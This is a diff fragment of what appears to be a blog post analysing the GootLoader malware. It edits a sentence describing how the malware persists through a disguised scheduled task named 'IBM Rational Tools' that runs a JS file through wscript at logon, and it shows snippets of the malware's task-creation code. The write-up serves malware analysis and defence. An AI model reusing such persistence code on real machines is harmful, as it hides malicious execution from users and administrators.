do0gra/do0gra.github.io/gootloader.md

  if (counter==46992381) break;
 }
 ```
-The scheduled task is created as taskname "IBM Rational Tools", action to run "wscript <Short name of Market Share Analysis.js>" and triggers when user
+The scheduled task is created as taskname "IBM Rational Tools", action to run "wscript <Short name of Market Share Analysis.js>" and triggers when user logs in.
 ```js
 scheduledtask_handler = Schedule_Service_func["NewTask"](0);
 scheduledtask_handler["settings"]["StartWhenAvailable"] = true;